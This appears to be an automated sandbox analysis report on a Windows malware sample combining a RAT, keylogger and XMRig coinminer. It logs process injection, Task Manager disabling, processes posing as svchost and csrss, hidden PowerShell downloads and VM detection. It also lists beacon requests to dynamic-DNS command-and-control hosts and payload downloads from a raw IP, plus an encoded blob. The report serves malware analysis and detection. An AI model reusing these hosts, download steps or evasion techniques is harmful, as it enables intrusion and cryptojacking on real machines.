zRtlKxKTS9Y2aJp6ELTuu0YkabNfCVfKUSarlbz0IaRNU3YHkZiZWulvJ017WINSxCVjKhNx7VrJbNgZ0smBlEq6LWs6RTKGFi5VDDKumvaRrQiKpVqsWbq2YrlFqB2p5atVSvVrFvVS1BDtQSlR3qsVZyKmzez1XweeiyWy5jnCoStmPANdqVklUuRnMVqTq8U+Nj1U8f+c7DFI3qMaS8XPdkZWJISTymaM5i4btQquaxdNfOnrui4uZ/6ia4Ypa3nHQdrQMcyita9U6tEDsWoFW0jLzgtrMZi3oUqonVPnGVrjjOjsPtkzyd9Jix8U+IxTnxDOqk/lcSfSeLPJSFufGvGPNPJ/uvCrYvnPoWMLs5C+0uyI0VKpUliQRKLkjgjiaQkzkrinCTeJYl3SyLFCb5SXExWAVZSzpm5U+0dVd4j6y5x4iyk4icVoT71sUjiiEhI7jumPZmmZdoO1olVdN1ber5qqZSHz+DOvHwrZ67KXhKyX+wOZI4mdadJlWlSUxFxp6y+LIm7JHG3JN4riXskocq+NEksSGJREmckkZwJtiBVtCAlXJANLkieRUmckczRUlAloUliYRqB4XptNwf9FIqmHbmvou5GZgBbss3I1eRqjlV0cref7J9iz8jYOfQijogixubsgl3D7qNY03ORubk1U7pJvVipRIZZLLt5I2fnskVHNwRnraTr4CwXS2XhPiLXWzWcslspZa2SXYXzq0KiYo6oAqQpl0y418jY9ZKLSIPAWawURZtGsVCdhUMMIHK9hlG1ijkdTtpBzNHtcrZWgJOuUEirWCb8rSsGJ95iitZcwdB1A2uuWuXRNkfNWyco0TKKeceAby3V7EiJp6zjfM20rGJZhwxQWMlEIDP1cj5btGrwzwUsbhdboxRMdvZmglhGcmpd3crlizYik1WAm8uV8tmaU9SzlmuWcgUXkb2sRwtOVsEWJm+V0Uu1DKdYyls6qpTNrFMoOJi4vF4ownH//qts+vwF0Rl24vPaq/EUzsOh3e2u48gsvjXh+9ND6Jv3s8yDJzfys+eER/h5nI9uzueT0edOyKeH7sJ+5DXGXk3MSl5N0O3gW6zFrgIdtgmqzhpsA+k60AVNzx9r//aGaOfoN+x+KXol15JgRx+bc28xj4VoJ2Bd5qPNHtuNbmf+CK/VRqmH3CHKPTYCXz+6y/lX2asa3ZSiQKYRuALk753QEt1xo2DUOVZFTo6V2Da/K52+Sa8wCzwH/JvhPbRCB4MM73tWNuD9H2K0HudjEc8FziP7s/E3ZDtcjsEROTNc58kY7xb+QnDPePJsBTzyj+bibvDXuUzE20Pf3ZgEs5I+eluBBvaR6uJfkRWQ7nCasfNcxjWU7fEWLM5/yKXcQ53RkbHM+ITWO0gf8Pm5Ft18TbxNLlsjaiOIZJNj671tGYWum5yvw8bQ4eiYrs+fwDOvxQz7f/zAl9IP17+ee6cF+dnzzj3f+9Zf03+l4p6WbnN95FsKe+SPFLbZsluPP3fz3l/+l9raM4df+fZv/fav8StjrY9fuTT0w+EVo3MQ9AL6nuaoH16JPh2+shYc+NlNo53NreRX9JV85nz+gWOZV3DKoHP+lWZ3vBf0hlea9Y0r/e3Hr0TvQVN6ZdDZfmc1c/rz8rdnEesPiM6czPfKt+OR7Xa7FbZ0citv5/kfRPHXFfbdWLj97n87iovX/80oDtelrb2FKH4+IaO4+Cej+L1cH8ejOD0fjpWdFMUZ16P2lqJ4k2vq7UdywX96JBftzqLhKk6Mt4vYx/My7Hfxl0FczUGCGng+xsd++4hOT43LePuIPi/rea670yO31FmJt3/r6D2vNyGTAY4hl3kbPR5ihLer93/6+UuFR/FvVN9pQX72vBPPfwGSlSukAMABAAA= regkey: HKEY_CURRENT_USER\Software\BE5BF4C9B7DA\_PIN	1	0	0

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW April 12, 2021, 10:33 a.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Windows (x86)\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Windows (x86)\WinRing0x64.sys desired_access: 983551 service_handle: 0x0000000000504100 error_control: 1 service_type: 1 service_manager_handle: 0x0000000000503f50	1	5259520	0

A stratum cryptocurrency mining command was executed (2 events)

cmdline	wmic process where name='xmrig.exe' delete
cmdline	taskkill /F /IM xmrig.exe

Disables Windows' Task Manager (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

Executes one or more WMI queries (8 events)

wmi	select * from antivirusproduct
wmi	SELECT * FROM Win32_Process WHERE ExecutablePath='C:\\Windows (x86)\\explorer.exe'
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "xmrig.exe")
wmi	SELECT * FROM Win32_Process WHERE name='taskmgr.exe'
wmi	SELECT * FROM Win32_Process WHERE name='Taskmgr.exe'
wmi	SELECT * FROM Win32_Process WHERE name='xmrig.exe'

Network communications indicative of possible code injection originated from the process explorer.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
WSASend April 12, 2021, 10:33 a.m.	buffer: ©UâÜÙ¿Às/{ÿï j'-mlyÅñv~Ý æ'ÄúþþåÅ41Ðhi:çáCmù 6[Ï>À,À0Ì©Ì¨ÌªÀ+À/À$À(kÀ#À'gÀ À9À À3=<5/ÿ # 0. + -3&$ up²ü¯®ùÁ9Jl¸Á?`,T¥: socket: 528		0	0
WSASend April 12, 2021, 10:33 a.m.	buffer: EIøüVX-3¶MÖûCÏék){Ä.åÔG¿zÛòW+óöYÔú0ÎÀG '9Ò,vvØ.²+.·§ 'SÏ¬Èc³'3<N»¿ZFsT¼4É´_8æ°ÅÈ%oÝd¥¿èÀN»Ý)\|.w }Ú-íü$CÎ¢,£!(GÇxV)Öd=QÂKÃU<MàKÍÔ´®F±³K8;ü°ä>·YmUúUc".ò!oo,n/I$ÜCö-fáz°Uö:«îooáÏã¦gõòRzÌPCòË? ð}addæÊ`pg ÎméhG^ÙÄµÒÐ7 XKèÌòB÷¡ªýUVYJðYÏIþõÚy.gAG0ßZ;©N§ÛÓ÷@÷å(LV,iXbDtºÍòÑqU¢»¿X¬dûõÿïrg¼pò4l4å ãúÜtUîHÏgàN¬o¢´ï£Â²X>4Èÿêw£/e+¦« Ì§G¸BRÿ¢RÇ±8)ØtïS=0ÖÐSôUzR\|HÁÒòÐ®Ö3KT(_8ÌçXá?$QcV¼Yt?\|¿nn<ûU×ðPø\?ï_h/´ÉvîMÁ¼%M_ap°ç!}FÏ×ÇÇhÈÆÌ<t´ûIÆ8ðV¦£Îù4¢Õ S,E?³Thb1Ù.¡Õ$1\mñ:}ªFT$þh)=Æ· 2!þ!Î{ÈÏ@9&qÐÂÝ£wyø socket: 528		0	0

wscript.exe-based dropper (JScript, VBS) (8 events)

Network communications indicative of a potential document or script payload download was initiated by the processes wscript.exe, powershell.exe (24 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.ddns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.ddnsking.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.3utilities.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.bounceme.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.freedynamicdns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://niogem1171.freedynamicdns.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
send April 12, 2021, 10:40 a.m.	buffer: ! socket: 972 sent: 1	1	1
send April 12, 2021, 10:41 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: niogem1171.freedynamicdns.org:16039 Content-Length: 109 Connection: Keep-Alive Cache-Control: no-cache socket: 1180 sent: 368	1	368
send April 12, 2021, 10:41 a.m.	buffer: ! socket: 972 sent: 1	1	1
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://muslada2251.ddns.net:16020/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW April 12, 2021, 10:40 a.m.	url: http://muslada2251.ddnsking.com:16020/is-ready flags: 0	1	1
HttpOpenRequestW April 12, 2021, 10:40 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
send April 12, 2021, 10:40 a.m.	buffer: ! socket: 976 sent: 1	1	1
send April 12, 2021, 10:40 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: muslada2251.ddnsking.com:16020 Content-Length: 109 Connection: Keep-Alive Cache-Control: no-cache socket: 1068 sent: 363	1	363
send April 12, 2021, 10:40 a.m.	buffer: ! socket: 976 sent: 1	1	1
send April 12, 2021, 10:40 a.m.	buffer: GET /xm/win.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive socket: 1420 sent: 73	1	73
send April 12, 2021, 10:41 a.m.	buffer: GET /xm/64a1.com HTTP/1.1 Host: 34.126.93.163 Connection: Keep-Alive socket: 1444 sent: 74	1	74

Expresses interest in specific running processes (1 event)

process: potential process injection target

wininit.exe

One or more non-whitelisted processes were created (14 events)

parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\z.vbs
parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\updateW\1234.bat
parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\updateW\1234.bat"
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\updateW\64a1.com"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\updateW\win.com"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\updateW\win.com
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\helps.vbs
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (18 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 232 resumed a thread in remote process 3236
Process injection	Process 8324 resumed a thread in remote process 5168
Process injection	Process 8324 resumed a thread in remote process 6584
Process injection	Process 2648 resumed a thread in remote process 3464
Process injection	Process 2648 resumed a thread in remote process 2456
Process injection	Process 2648 resumed a thread in remote process 7460
Process injection	Process 2648 resumed a thread in remote process 3356
Process injection	Process 5996 resumed a thread in remote process 6872
Process injection	Process 5996 resumed a thread in remote process 6792
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x000002e4 suspend_count: 1 process_identifier: 3236	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 5168	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000298 suspend_count: 0 process_identifier: 6584	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000274 suspend_count: 1 process_identifier: 3464	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 2456	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 7460	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x000001fc suspend_count: 0 process_identifier: 3356	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 6872	1	0	0
NtResumeThread April 12, 2021, 10:40 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 6792	1	0	0

Created a process named as a common system process (8 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 12, 2021, 10:40 a.m.	thread_identifier: 6496 thread_handle: 0x00000088 process_identifier: 6872 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW April 12, 2021, 10:40 a.m.	thread_identifier: 5052 thread_handle: 0x00000084 process_identifier: 6792 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW April 12, 2021, 10:41 a.m.	thread_identifier: 8180 thread_handle: 0x000002dc process_identifier: 7848 current_directory: C:\Users\test22\AppData\Local\Temp\updateW filepath: C:\ProgramData\svchost.exe track: 1 command_line: "C:\ProgramData\svchost.exe" filepath_r: C:\ProgramData\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c8	1	1
ShellExecuteExW April 12, 2021, 10:41 a.m.	show_type: 1 filepath_r: C:\ProgramData\svchost.exe parameters: filepath: C:\ProgramData\svchost.exe	1	1
CreateProcessInternalW April 12, 2021, 10:41 a.m.	thread_identifier: 8904 thread_handle: 0x000004b8 process_identifier: 2620 current_directory: C:\Users\test22\AppData\Local\Temp\updateW filepath: C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe" filepath_r: C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004c0	1	1
ShellExecuteExW April 12, 2021, 10:41 a.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe parameters: filepath: C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe	1	1
CreateProcessInternalW April 12, 2021, 10:41 a.m.	thread_identifier: 6984 thread_handle: 0x000002f0 process_identifier: 4156 current_directory: C:\Windows (x86) filepath: C:\Windows (x86)\explorer.exe track: 1 command_line: "C:\Windows (x86)\explorer.exe" filepath_r: C:\Windows (x86)\explorer.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f4	1	1
ShellExecuteExW April 12, 2021, 10:41 a.m.	show_type: 1 filepath_r: C:\Windows (x86)\explorer.exe parameters: filepath: C:\Windows (x86)\explorer.exe	1	1

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 12, 2021, 10:33 a.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

Powershell Downloader DFSP detected (1 event)

File has been identified by 53 AntiVirus engines on VirusTotal as malicious (50 out of 53 events)

Bkav	W32.AIDetect.malware2
DrWeb	Trojan.Siggen7.63254
MicroWorld-eScan	Trojan.GenericKD.36678709
FireEye	Generic.mg.89239d803d0a9f3c
CAT-QuickHeal	Trojan.MsilFC.S19436131
McAfee	Artemis!89239D803D0A
Cylance	Unsafe
K7AntiVirus	Trojan ( 0056e5201 )
Alibaba	Trojan:Win32/Bladabindi.374
K7GW	Trojan ( 0056e5201 )
Cybereason	malicious.03d0a9
Arcabit	Trojan.Generic.D22FAC35
BitDefenderTheta	Gen:NN.ZemsilF.34670.biW@aWTRSac
Cyren	W32/Tasker.A.gen!Eldorado
Symantec	Trojan.Gen.MBT
ESET-NOD32	multiple detections
APEX	Malicious
Avast	Win32:KeyloggerX-gen [Trj]
Cynet	Malicious (score: 100)
Kaspersky	Trojan.MSIL.Disfa.bqd
BitDefender	Trojan.GenericKD.36678709
NANO-Antivirus	Trojan.Win32.Disfa.dtznyx
Paloalto	generic.ml
Tencent	Msil.Trojan.Tasker.Dztj
Ad-Aware	Trojan.GenericKD.36678709
Emsisoft	Trojan.GenericKD.36678709 (B)
Comodo	fls.noname@0
Baidu	MSIL.Backdoor.Bladabindi.a
VIPRE	Trojan.Win32.Generic.pak!cobra
TrendMicro	Coinminer.MSIL.LIMERAT.SMA
McAfee-GW-Edition	BehavesLike.Win32.Generic.fh
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious SFX
Avira	TR/Spy.Gen8
Gridinsoft	Backdoor.Win32.DarkKomet.oa
Microsoft	Trojan:Win32/AutoitInject.BI!MTB
AegisLab	Trojan.Win32.Malicious.4!c
ZoneAlarm	HEUR:Trojan-Spy.MSIL.KeyLogger.gen
GData	Script.Trojan.Agent.EMZXYK
AhnLab-V3	Trojan/Win.Disfa.C4407000
VBA32	Trojan.MSIL.Disfa
ALYac	Trojan.GenericKD.36678709
MAX	malware (ai score=100)
Malwarebytes	Malware.AI.1898886560
Rising	Worm.Jenxcus!8.409 (TOPIS:E0:ojvswUTERmH)
Yandex	Trojan.Tasker!YF2n/w7ayYc
Ikarus	Trojan.MSIL.Agent
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.SWO!tr
AVG	Win32:KeyloggerX-gen [Trj]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (23 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\win.com
file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.com

IE.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All